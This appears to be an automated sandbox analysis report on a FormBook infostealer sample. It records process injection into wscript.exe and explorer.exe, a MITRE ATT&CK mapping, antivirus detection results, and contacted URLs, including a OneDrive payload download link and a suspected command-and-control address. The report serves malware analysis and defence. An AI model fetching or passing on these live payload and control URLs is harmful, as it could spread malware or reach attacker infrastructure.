Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C51BE mov eax, dword ptr fs:[00000030h]	1_2_059C51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059761A0 mov eax, dword ptr fs:[00000030h]	1_2_059761A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059761A0 mov eax, dword ptr fs:[00000030h]	1_2_059761A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C69A6 mov eax, dword ptr fs:[00000030h]	1_2_059C69A6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059D41E8 mov eax, dword ptr fs:[00000030h]	1_2_059D41E8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0594B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0594B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0594B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949100 mov eax, dword ptr fs:[00000030h]	1_2_05949100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949100 mov eax, dword ptr fs:[00000030h]	1_2_05949100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949100 mov eax, dword ptr fs:[00000030h]	1_2_05949100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597513A mov eax, dword ptr fs:[00000030h]	1_2_0597513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597513A mov eax, dword ptr fs:[00000030h]	1_2_0597513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05964120 mov eax, dword ptr fs:[00000030h]	1_2_05964120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05964120 mov eax, dword ptr fs:[00000030h]	1_2_05964120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05964120 mov eax, dword ptr fs:[00000030h]	1_2_05964120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05964120 mov eax, dword ptr fs:[00000030h]	1_2_05964120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05964120 mov ecx, dword ptr fs:[00000030h]	1_2_05964120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596B944 mov eax, dword ptr fs:[00000030h]	1_2_0596B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596B944 mov eax, dword ptr fs:[00000030h]	1_2_0596B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594B171 mov eax, dword ptr fs:[00000030h]	1_2_0594B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594B171 mov eax, dword ptr fs:[00000030h]	1_2_0594B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594C962 mov eax, dword ptr fs:[00000030h]	1_2_0594C962
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949080 mov eax, dword ptr fs:[00000030h]	1_2_05949080
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C3884 mov eax, dword ptr fs:[00000030h]	1_2_059C3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C3884 mov eax, dword ptr fs:[00000030h]	1_2_059C3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0597F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597F0BF mov eax, dword ptr fs:[00000030h]	1_2_0597F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597F0BF mov eax, dword ptr fs:[00000030h]	1_2_0597F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059890AF mov eax, dword ptr fs:[00000030h]	1_2_059890AF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059720A0 mov eax, dword ptr fs:[00000030h]	1_2_059720A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059720A0 mov eax, dword ptr fs:[00000030h]	1_2_059720A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059720A0 mov eax, dword ptr fs:[00000030h]	1_2_059720A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059720A0 mov eax, dword ptr fs:[00000030h]	1_2_059720A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059720A0 mov eax, dword ptr fs:[00000030h]	1_2_059720A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059720A0 mov eax, dword ptr fs:[00000030h]	1_2_059720A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_059DB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_059DB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_059DB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_059DB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_059DB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_059DB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059440E1 mov eax, dword ptr fs:[00000030h]	1_2_059440E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059440E1 mov eax, dword ptr fs:[00000030h]	1_2_059440E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059440E1 mov eax, dword ptr fs:[00000030h]	1_2_059440E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059458EC mov eax, dword ptr fs:[00000030h]	1_2_059458EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C7016 mov eax, dword ptr fs:[00000030h]	1_2_059C7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C7016 mov eax, dword ptr fs:[00000030h]	1_2_059C7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C7016 mov eax, dword ptr fs:[00000030h]	1_2_059C7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A14015 mov eax, dword ptr fs:[00000030h]	1_2_05A14015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A14015 mov eax, dword ptr fs:[00000030h]	1_2_05A14015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597002D mov eax, dword ptr fs:[00000030h]	1_2_0597002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597002D mov eax, dword ptr fs:[00000030h]	1_2_0597002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597002D mov eax, dword ptr fs:[00000030h]	1_2_0597002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597002D mov eax, dword ptr fs:[00000030h]	1_2_0597002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597002D mov eax, dword ptr fs:[00000030h]	1_2_0597002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595B02A mov eax, dword ptr fs:[00000030h]	1_2_0595B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595B02A mov eax, dword ptr fs:[00000030h]	1_2_0595B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595B02A mov eax, dword ptr fs:[00000030h]	1_2_0595B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595B02A mov eax, dword ptr fs:[00000030h]	1_2_0595B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05960050 mov eax, dword ptr fs:[00000030h]	1_2_05960050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05960050 mov eax, dword ptr fs:[00000030h]	1_2_05960050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A02073 mov eax, dword ptr fs:[00000030h]	1_2_05A02073
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A11074 mov eax, dword ptr fs:[00000030h]	1_2_05A11074
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972397 mov eax, dword ptr fs:[00000030h]	1_2_05972397
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A15BA5 mov eax, dword ptr fs:[00000030h]	1_2_05A15BA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597B390 mov eax, dword ptr fs:[00000030h]	1_2_0597B390
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05951B8F mov eax, dword ptr fs:[00000030h]	1_2_05951B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05951B8F mov eax, dword ptr fs:[00000030h]	1_2_05951B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059FD380 mov ecx, dword ptr fs:[00000030h]	1_2_059FD380
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0138A mov eax, dword ptr fs:[00000030h]	1_2_05A0138A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05974BAD mov eax, dword ptr fs:[00000030h]	1_2_05974BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05974BAD mov eax, dword ptr fs:[00000030h]	1_2_05974BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05974BAD mov eax, dword ptr fs:[00000030h]	1_2_05974BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C53CA mov eax, dword ptr fs:[00000030h]	1_2_059C53CA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C53CA mov eax, dword ptr fs:[00000030h]	1_2_059C53CA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059703E2 mov eax, dword ptr fs:[00000030h]	1_2_059703E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059703E2 mov eax, dword ptr fs:[00000030h]	1_2_059703E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059703E2 mov eax, dword ptr fs:[00000030h]	1_2_059703E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059703E2 mov eax, dword ptr fs:[00000030h]	1_2_059703E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059703E2 mov eax, dword ptr fs:[00000030h]	1_2_059703E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059703E2 mov eax, dword ptr fs:[00000030h]	1_2_059703E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0596DBE9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0131B mov eax, dword ptr fs:[00000030h]	1_2_05A0131B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594F358 mov eax, dword ptr fs:[00000030h]	1_2_0594F358
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594DB40 mov eax, dword ptr fs:[00000030h]	1_2_0594DB40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05973B7A mov eax, dword ptr fs:[00000030h]	1_2_05973B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05973B7A mov eax, dword ptr fs:[00000030h]	1_2_05973B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0594DB60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A18B58 mov eax, dword ptr fs:[00000030h]	1_2_05A18B58
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597D294 mov eax, dword ptr fs:[00000030h]	1_2_0597D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597D294 mov eax, dword ptr fs:[00000030h]	1_2_0597D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0595AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0595AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0597FAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059452A5 mov eax, dword ptr fs:[00000030h]	1_2_059452A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059452A5 mov eax, dword ptr fs:[00000030h]	1_2_059452A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059452A5 mov eax, dword ptr fs:[00000030h]	1_2_059452A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059452A5 mov eax, dword ptr fs:[00000030h]	1_2_059452A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059452A5 mov eax, dword ptr fs:[00000030h]	1_2_059452A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972ACB mov eax, dword ptr fs:[00000030h]	1_2_05972ACB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972AE4 mov eax, dword ptr fs:[00000030h]	1_2_05972AE4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594AA16 mov eax, dword ptr fs:[00000030h]	1_2_0594AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594AA16 mov eax, dword ptr fs:[00000030h]	1_2_0594AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05945210 mov eax, dword ptr fs:[00000030h]	1_2_05945210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05945210 mov ecx, dword ptr fs:[00000030h]	1_2_05945210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05945210 mov eax, dword ptr fs:[00000030h]	1_2_05945210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05945210 mov eax, dword ptr fs:[00000030h]	1_2_05945210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05963A1C mov eax, dword ptr fs:[00000030h]	1_2_05963A1C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05958A0A mov eax, dword ptr fs:[00000030h]	1_2_05958A0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05984A2C mov eax, dword ptr fs:[00000030h]	1_2_05984A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05984A2C mov eax, dword ptr fs:[00000030h]	1_2_05984A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0AA16 mov eax, dword ptr fs:[00000030h]	1_2_05A0AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0AA16 mov eax, dword ptr fs:[00000030h]	1_2_05A0AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A18A62 mov eax, dword ptr fs:[00000030h]	1_2_05A18A62
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059D4257 mov eax, dword ptr fs:[00000030h]	1_2_059D4257
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949240 mov eax, dword ptr fs:[00000030h]	1_2_05949240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949240 mov eax, dword ptr fs:[00000030h]	1_2_05949240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949240 mov eax, dword ptr fs:[00000030h]	1_2_05949240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05949240 mov eax, dword ptr fs:[00000030h]	1_2_05949240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0598927A mov eax, dword ptr fs:[00000030h]	1_2_0598927A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0EA55 mov eax, dword ptr fs:[00000030h]	1_2_05A0EA55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059FB260 mov eax, dword ptr fs:[00000030h]	1_2_059FB260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059FB260 mov eax, dword ptr fs:[00000030h]	1_2_059FB260

Source: C:\Windows\SysWOW64\wscript.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Code function: 1_2_059895D0 NtClose,LdrInitializeThunk,

1_2_059895D0

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\wscript.exe

Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Memory written: C:\Windows\SysWOW64\wscript.exe base: 10410000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Memory written: C:\Windows\SysWOW64\wscript.exe base: 4740000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Memory written: C:\Windows\SysWOW64\wscript.exe base: 47E0000	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Memory allocated: C:\Windows\SysWOW64\wscript.exe base: 10410000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Memory allocated: C:\Windows\SysWOW64\wscript.exe base: 4740000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Memory allocated: C:\Windows\SysWOW64\wscript.exe base: 47E0000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Memory written: C:\Windows\SysWOW64\wscript.exe base: 10410000 value starts with: 4D5A

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Thread created: C:\Windows\SysWOW64\wscript.exe EIP: 47E0000

Jump to behavior

Source: explorer.exe, 00000002.00000000.283075686.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.566817339.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: wscript.exe, 00000001.00000002.572034695.0000000005D50000.00000040.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.311425459.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.295382683.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.283075686.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.566817339.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: wscript.exe, 00000001.00000002.572034695.0000000005D50000.00000040.00000001.00040000.00000000.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000002.00000000.281785582.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.563450551.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000002.00000000.283075686.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.566817339.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02725D0C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: GetLocaleInfoA,	0_2_0272AA04
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: GetLocaleInfoA,	0_2_0272A9B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02725E18

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_02729438 GetLocalTime,

0_2_02729438

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_0272B938 GetVersionExA,

0_2_0272B938

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	52 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	52 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	114 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	15%	ReversingLabs	Win32.Trojan.Generic
SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	31%	Virustotal		Browse
SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	100%	Avira	HEUR/AGEN.1214697
SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\Iuigzwjd.exe	100%	Avira	HEUR/AGEN.1214697
C:\Users\Public\Libraries\Iuigzwjd.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Iuigzwjd.exe	15%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.25c8248.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.wscript.exe.10410000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2581218.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1214697	Download File
1.0.wscript.exe.10410000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.wscript.exe.5d50000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.wscript.exe.10410000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.wscript.exe.10410000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.wscript.exe.10410000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2720000.2.unpack	100%	Avira	TR/Hijacker.Gen	Download File
0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2a2eed8.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.2.Iuigzwjd.exe.2438248.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.brainbookgroup.com/nvp4/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
l-0003.l-dc-msedge.net	13.107.43.12	true	false	unknown
l-0004.l-dc-msedge.net	13.107.43.13	true	false	unknown
onedrive.live.com	unknown	unknown	false	high
oyuurg.ph.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21850&authkey=AEcOcvbyHqeCMT0	false		high
www.brainbookgroup.com/nvp4/	true	Avira URL Cloud: safe	low
https://oyuurg.ph.files.1drv.com/y4mJr27PXKP1w7VmweyBhr9jXuXcCKUmjp-l0AjYgYvmFILscr-gs1ZCYQgPakl85NdXiyluyI2K__n-DTHXtIuKBfix9QJgWA8xZXLmTFKCzO-QrrlJfjFNlxYKvj4CV1InzMNLAsu2pDihkqbVzbigQu3lZ2fbCWy9RogAq5NxzuJ1VRoowitd9q4QmyU6H1eR5JdbJA1JsNbjwDPqFHy3g/Iuigzwjduoa?download&psid=1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.328190890.000000000F270000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.107.43.12	l-0003.l-dc-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.43.13	l-0004.l-dc-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755939
Start date and time:	2022-11-29 10:40:46 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
